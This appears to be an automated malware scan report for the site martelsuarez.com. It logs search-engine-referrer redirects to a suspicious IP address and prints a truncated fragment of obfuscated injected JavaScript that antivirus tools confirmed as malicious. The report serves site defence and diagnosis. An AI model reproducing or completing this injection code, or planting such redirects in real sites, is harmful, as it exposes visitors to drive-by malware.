Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://martelsuarez.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: martelsuarez.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 14 Sep 2014 17:24:24 GMT Location: http://77.78.239.18/kz.php?sa=04 Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://martelsuarez.com/ | 200 OK Content-Length: 9964 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function jIxnUrxy(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(jIxnUrxy()>100000){window.name=3884595755666519495547423784526814254729275736776229961339682363787169177551228741637751728945214929;var rVwKZEnt='%u0032%u000e%u0067%u0001%u0073%u0012%u007f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061%u0050%u0070%u0018%u007d%u0014%u007 ...[702 bytes skipped]...
Antivirus reports:
http://martelsuarez.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 17:24:25 GMT Location: http://77.78.239.18/kz.php?sa=04 Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://77.78.239.18/kz.php?sa=04 | 500 Can't connect to 77.78.239.18:80 (В соединении отказано) Content-Length: 206 Content-Type: text/plain | clean |
http://77.78.239.18/test404page.js | 500 Can't connect to 77.78.239.18:80 (В соединении отказано) Content-Length: 206 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=martelsuarez.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://martelsuarez.com/
Result: martelsuarez.com is not infected or malware details are not published yet.